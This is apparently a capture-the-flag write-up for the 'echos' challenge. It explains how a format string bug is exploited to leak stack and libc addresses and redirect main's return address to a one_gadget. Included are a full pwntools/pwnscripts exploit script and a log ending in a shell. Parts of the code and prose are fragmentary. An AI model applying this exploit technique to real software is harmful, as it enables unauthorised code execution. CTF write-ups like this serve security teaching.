Tags: fsb one_gadget pwnscripts leak
Rating: 4.0
Author: k0wa1ski#6150 and Faith#2563
Hello there! I learnt C last week and already made my own SaaS product, check it out! I even made sure not to use compiler flags like --please-make-me-extremely-insecure, so everything should be swell.
nc chal.duc.tf 30001
Hint - The challenge server is running Ubuntu 18.04.
Attached files: echos
(sha256: 2311c57a6436e56814e1fe82bdd728f90e5832fda8abc71375ef3ef8d9d239ca)
int main() {
char s[0x48]; // [rsp+10h] [rbp-50h]
int64_t cookie = __readfsqword(0x28u); // [rsp+58h] [rbp-8h]
for (int i = 0; i <= 2; i++) {
fgets(s, 0x40, stdin);
return 0;
$ checksec echos
[*] 'echos'
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
This challenge is a simple exercise in format string exploitation. Given a binary with all security hardening measures enabled, the goal is to open a shell using nothing but user-controlled calls to printf()
It's really important that there's more than 1 printf()
call; as far as I know, it's impossible<sup>1</sup> to exploit a hardened binary with only a single call to printf()
Anyway, with 2 printf()
calls, the solution is visible to anyone familiar with FSBs<sup>2</sup>:
in the first call. The two addresses we're leaking here are
, which is a libc leak (for FSBs) that's always available in a binary that calls main()
to replace the return address of main()
with a jump to a one_gadget
.The implementation for both steps is also trivial:
offsets to the addresses to be leaked using pwnscripts.fsb.find_offset
(with the offsets found earlier) to leak out the relevant addresses. Calculate the libc base (context.libc.calc_base
) and the location of the return pointer<sup>3</sup> here.pwntools
' fmtstr_payload
to generate the whole %n
payload. Use write_size='short'
here, because the default write_size
generates a payload too large for ./echos
' fgets(64)
to accept.from pwnscripts import *
context.binary = 'echos'
context.libc_database = 'libc-database'
context.libc = 'libc6_2.27-3ubuntu1_amd64' # Assumed from prev chals
args = ('chal.duc.tf', 30001)
def printf(l:str):
r = remote(*args)
return r.recvline()
# Finding printf offsets.
config.PRINTF_MIN = 7
buffer = fsb.find_offset.buffer(printf, maxlen=63)
stack = fsb.find_offset.stack(printf) # This requires config.PRINTF_MIN
ret_off = fsb.find_offset.libc(printf, context.libc.symbols['__libc_start_main_ret']%0x100)
DIST_TO_RET = (ret_off-buffer)*context.bytes
# Leak stack & libc
r = remote(*args)
r.sendline('%{}$p,%{}$p'.format(stack, ret_off))
stack_leak, libc_main_ret = extract_all_hex(r.recvline())
buffer_addr = stack_leak-0x130 # EMPIRICAL OFFSET
context.libc.calc_base('__libc_start_main_ret', libc_main_ret)
# Return to one_gadget; use 'short' to stay within input length
write = {buffer_addr+DIST_TO_RET: context.libc.select_gadget(1)}
r.sendline(payload:=fmtstr_payload(buffer, write, write_size='short'))
strlen = payload.find(b'\0') # This part is here to shut up the whitespace spam of fmtstr_payload
That's it.
[*] pwnscripts.fsb.find_offset for buffer: 8
[*] pwnscripts.fsb.find_offset for 'stack': 16
[*] pwnscripts.fsb.find_offset for 'libc': 19
[+] Opening connection to chal.duc.tf on port 30001: Done
[*] Switching to interactive mode
$ ls
$ cat flag.txt
(for now). In order to find where main()
's stack resided, I used gdb
to find the approximate difference between the leaked stack address and main()
's stack, followed by a %s
test to ensure that the calculated location of main()
's stack was valid:
# ... insert first leak here ...
# Test that leaked address calculation is valid:
print_stack = '%{}$s'.format(buffer+1).ljust(8).encode() + pack(stack_leak-0x130+0x10) + cyclic(40).encode()
[+] Opening connection to chal.duc.tf on port 30001: Done